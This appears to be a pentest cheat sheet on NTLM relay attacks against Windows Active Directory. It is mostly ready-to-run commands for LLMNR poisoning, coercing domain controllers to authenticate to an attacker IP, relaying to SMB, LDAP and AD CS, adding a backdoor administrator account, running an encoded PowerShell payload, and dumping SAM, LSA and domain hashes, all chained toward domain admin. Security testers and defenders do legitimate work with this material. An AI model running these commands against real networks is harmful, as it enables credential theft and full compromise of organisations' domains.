Exploitation

Relay Attacks

Relay captured NTLM authentication to other services instead of cracking hashes. Extremely effective when SMB signing is disabled.

Danger

Relay attacks can cause service disruption. Test in controlled environments first and ensure you have proper authorization.

Tool Installation

Required Tools

Impacket (ntlmrelayx) - NTLM relay toolkit

pip install impacket

GitHub: fortra/impacket

mitm6 - IPv6 DNS takeover

pip install mitm6

GitHub: dirkjanm/mitm6

PetitPotam - MS-EFSRPC coercion

git clone https://github.com/topotam/PetitPotam

GitHub: topotam/PetitPotam

Coercer - Multi-protocol coercion

pip install coercer

GitHub: p0dalirius/Coercer

Prerequisites Check

Check SMB Signing

NTLM relay to SMB requires SMB signing to be disabled or not required on the target. Most Windows clients have signing not required by default.

SMB Signing Defaults:

  • Domain Controllers - Signing required (cannot relay to DCs via SMB)
  • Windows Servers - Signing not required (relayable)
  • Windows Clients - Signing not required (relayable)
bash 
# CrackMapExec - generate relay target list (recommended)
crackmapexec smb 192.168.1.0/24 --gen-relay-list relay_targets.txt

# Nmap SMB signing check
nmap -p445 --script smb-security-mode 192.168.1.0/24
nmap -p445 --script smb-security-mode 192.168.1.0/24 -oG - | grep 'not required'

# RunFinger (Responder toolkit)
cd /usr/share/responder/tools
python RunFinger.py -i 192.168.1.0/24

# NetExec (CrackMapExec successor)
nxc smb 192.168.1.0/24 --gen-relay-list targets.txt

NTLM Relay to SMB

Basic SMB Relay

Step 1: Configure Responder to not respond on SMB/HTTP (ntlmrelayx will handle these)

bash 
# Edit Responder configuration
sudo nano /etc/responder/Responder.conf

# Set these to Off:
SMB = Off
HTTP = Off

Step 2: Start Responder to poison LLMNR/NBT-NS (Terminal 1)

bash 
# Start Responder (with SMB/HTTP disabled in config)
sudo responder -I eth0 -dwPv

Step 3: Start ntlmrelayx to relay captured auth (Terminal 2)

bash 
# Basic relay - dumps SAM when successful
sudo ntlmrelayx.py -tf relay_targets.txt -smb2support

# With command execution
sudo ntlmrelayx.py -tf relay_targets.txt -smb2support -c 'whoami'
sudo ntlmrelayx.py -tf relay_targets.txt -smb2support -c 'net user hacker P@ssw0rd! /add && net localgroup administrators hacker /add'

# Execute PowerShell encoded command
sudo ntlmrelayx.py -tf relay_targets.txt -smb2support -c 'powershell -enc BASE64_ENCODED_PAYLOAD'

Information

How it works: User's machine broadcasts LLMNR → Responder responds → User authenticates to attacker → ntlmrelayx forwards auth to target → Target executes commands with user's privileges

Relay with SAM Dump

bash 
# Dump SAM database from relayed target
sudo ntlmrelayx.py -tf relay_targets.txt -smb2support --dump-sam

# Dump LSA secrets
sudo ntlmrelayx.py -tf relay_targets.txt -smb2support --dump-lsa

Interactive SMB Shell

bash 
# Get interactive SMB shell
sudo ntlmrelayx.py -tf relay_targets.txt -smb2support -i

# Connect to the shell (when relay happens)
nc 127.0.0.1 11000

# Available commands: shares, use, cd, ls, get, put, cat, info

LDAP Relay

Relaying to LDAP/LDAPS allows modifying Active Directory objects. Requires relaying a privileged user or exploiting default AD permissions.

LDAP vs LDAPS:

  • LDAP (389) - Can relay from SMB (no channel binding)
  • LDAPS (636) - Required for some operations, may require LDAP signing disabled

Relay to LDAP - Add Computer

By default, any domain user can add up to 10 computer accounts (ms-DS-MachineAccountQuota).

bash 
# Relay to LDAP and add a computer account
sudo ntlmrelayx.py -t ldap://DC_IP --add-computer YOURPC 'Password123!'

# Relay to LDAPS (more reliable for some operations)
sudo ntlmrelayx.py -t ldaps://DC_IP --add-computer

# After adding computer, you can use it for RBCD attacks
# Check the computer was created
crackmapexec ldap DC_IP -u user -p pass -M maq

Relay to LDAP - Resource-Based Constrained Delegation (RBCD)

Configure delegation on target computer to allow your controlled machine to impersonate users.

bash 
# Step 1: Relay to LDAP with delegate-access flag
sudo ntlmrelayx.py -t ldap://DC_IP --delegate-access --escalate-user YOURPC$

# This modifies msDS-AllowedToActOnBehalfOfOtherIdentity on the target

# Step 2: Use S4U to get service ticket as admin
# Get TGT for your controlled computer
getST.py -spn cifs/TARGET.corp.local corp.local/YOURPC$:'Password123!' -impersonate Administrator

# Step 3: Use the ticket
export KRB5CCNAME=Administrator.ccache
psexec.py -k -no-pass TARGET.corp.local
secretsdump.py -k -no-pass TARGET.corp.local

Tip

Full RBCD Chain: Coerce auth (PetitPotam) → Relay to LDAP → Add computer account → Set RBCD delegation → S4U2Self/S4U2Proxy → Admin ticket → DCSync

Authentication Coercion

Coercion techniques force a target machine to authenticate to your attacker machine, providing credentials to relay.

Coercion Methods:

  • PetitPotam - MS-EFSRPC (EFS) - Most common
  • PrinterBug - MS-RPRN (Print Spooler)
  • DFSCoerce - MS-DFSNM (DFS)
  • ShadowCoerce - MS-FSRVP (File Server VSS)
  • Coercer - Tests all methods automatically

Coercer - Test All Methods

Coercer automatically tests multiple coercion techniques to find working methods.

bash 
# Install Coercer
pip install coercer

# Scan for coercion vulnerabilities
coercer scan -t TARGET_IP -u user -p password -d corp.local

# Coerce authentication to attacker
coercer coerce -l ATTACKER_IP -t TARGET_IP -u user -p password -d corp.local

# Target specific method
coercer coerce -l ATTACKER_IP -t TARGET_IP -u user -p password -d corp.local --filter-method-name PetitPotam

PetitPotam

bash 
# Download PetitPotam
git clone https://github.com/topotam/PetitPotam.git
cd PetitPotam

# Unauthenticated coercion (if vulnerable - patched systems require auth)
python PetitPotam.py ATTACKER_IP TARGET_IP

# Authenticated (works on patched systems)
python PetitPotam.py -d corp.local -u user -p 'password' ATTACKER_IP TARGET_IP

# Full attack chain with AD CS
# Terminal 1: Start relay to ADCS
sudo ntlmrelayx.py -t http://CA_IP/certsrv/certfnsh.asp -smb2support --adcs --template DomainController

# Terminal 2: Trigger coercion
python PetitPotam.py ATTACKER_IP DC_IP

PrinterBug (SpoolSample)

Requires Print Spooler service running on target (common on workstations and servers).

bash 
# Check if Print Spooler is running
rpcdump.py @TARGET_IP | grep -i spoolsv
crackmapexec smb TARGET_IP -u user -p pass -M spooler

# Python PrinterBug
git clone https://github.com/dirkjanm/krbrelayx.git
python krbrelayx/printerbug.py corp.local/user:password@TARGET ATTACKER_IP

# Windows SpoolSample.exe
SpoolSample.exe TARGET ATTACKER

# Requires auth, triggers callback from TARGET to ATTACKER

DFSCoerce

Coerces authentication via the DFS service (Distributed File System).

bash 
# Download DFSCoerce
git clone https://github.com/Wh04m1001/DFSCoerce.git
cd DFSCoerce

# Coerce via DFS
python dfscoerce.py -d corp.local -u user -p password ATTACKER TARGET

# DFS typically requires authentication

IPv6 DNS Takeover (mitm6)

mitm6 exploits Windows' default IPv6 configuration to become the DNS server and redirect traffic.

How it works:

  1. Windows prefers IPv6 over IPv4 by default
  2. mitm6 sends DHCPv6 replies to become the DNS server
  3. Victim queries DNS through attacker
  4. Attacker responds with own IP for WPAD proxy
  5. Victim authenticates to attacker's fake proxy
  6. Credentials relayed to target (LDAP/ADCS)
bash 
# Install mitm6
pip install mitm6

# Start mitm6 to poison IPv6 DNS
sudo mitm6 -d corp.local

# Combined with ntlmrelayx for WPAD (full attack)
# Terminal 1: Start mitm6
sudo mitm6 -d corp.local

# Terminal 2: Start ntlmrelayx with WPAD
sudo ntlmrelayx.py -6 -t ldaps://DC_IP -wh wpad.corp.local --delegate-access

# -6: Enable IPv6
# -wh: WPAD host to serve
# --delegate-access: Configure RBCD on relayed computer

# Wait for machines to refresh DHCP/DNS (can take minutes to hours)
# Works best during business hours when users are logging in

Warning

Patience Required: mitm6 attacks can take time as they rely on DHCPv6 lease renewal. Best run during work hours when machines are actively being used.

Relay to ADCS (ESC8)

Active Directory Certificate Services web enrollment is often vulnerable to NTLM relay attacks. This is known as ESC8.

ESC8 Requirements:

  • Web Enrollment enabled on Certificate Authority
  • HTTP endpoints (not HTTPS with EPA)
  • Certificate template that allows authentication (Machine, User, DomainController)

Enumerate ADCS

bash 
# Find ADCS with CrackMapExec
crackmapexec ldap DC_IP -u user -p pass -M adcs

# Find with certipy
certipy find -u user@corp.local -p password -dc-ip DC_IP

# Check for vulnerable web enrollment
curl -I http://CA_IP/certsrv/
# 401 response = Web enrollment enabled

Relay Attack Chain

bash 
# Step 1: Start relay to ADCS web enrollment
sudo ntlmrelayx.py -t http://CA_IP/certsrv/certfnsh.asp -smb2support --adcs --template DomainController

# Step 2: Trigger coercion from DC
python PetitPotam.py ATTACKER_IP DC_IP

# Step 3: ntlmrelayx will output a Base64 certificate
# Save it to a file and convert
echo 'BASE64_CERT' | base64 -d > dc.pfx

# Step 4: Authenticate with certificate
certipy auth -pfx dc.pfx -dc-ip DC_IP

# Step 5: You now have DC machine hash - DCSync!
secretsdump.py -hashes :NTLM_HASH corp.local/DC$@DC_IP

Tip

ESC8 to Domain Admin: PetitPotam to DC → Relay to ADCS → DC Certificate → Authenticate as DC → DCSync all hashes

Multi-Relay with SOCKS Proxy

SOCKS mode keeps sessions open, allowing you to use multiple tools through relayed connections.

bash 
# Start ntlmrelayx in SOCKS mode
sudo ntlmrelayx.py -tf targets.txt -smb2support -socks

# List active sessions in ntlmrelayx console
socks

# Configure proxychains
# Edit /etc/proxychains4.conf:
# socks4 127.0.0.1 1080

# Use tools through SOCKS (no password needed - using relayed session)
proxychains secretsdump.py -no-pass corp.local/admin@TARGET
proxychains smbclient.py -no-pass corp.local/admin@TARGET
proxychains reg.py -no-pass corp.local/admin@TARGET query -keyName 'HKLM\SAM'

SOCKS Session Notes:

  • Sessions are user-to-target specific
  • Use socks command in ntlmrelayx to list active sessions
  • AdminStatus shows if user has admin on target
  • Sessions timeout after period of inactivity

Tip

When relaying, the captured credential's privileges apply on the target. A domain admin credential relayed to a workstation gives admin access on that workstation.

External Resources

The Hacker Recipes - NTLM Relay

Comprehensive guide on NTLM relay attacks

mitm6 - FOX-IT Blog

Original mitm6 research and attack details

AD CS Relay Attack Guide

Practical ESC8 attack walkthrough

Certipy - GitHub

Tool for AD CS enumeration and abuse

Coercer - GitHub

Automated Windows authentication coercion

ADCS + PetitPotam - ired.team

Complete relay chain to krbtgt hash

Related Topics

Credential Attacks

LLMNR poisoning and password spraying

Kerberos Attacks

Kerberoasting and ticket attacks

Exploitation Overview

Back to main exploitation guide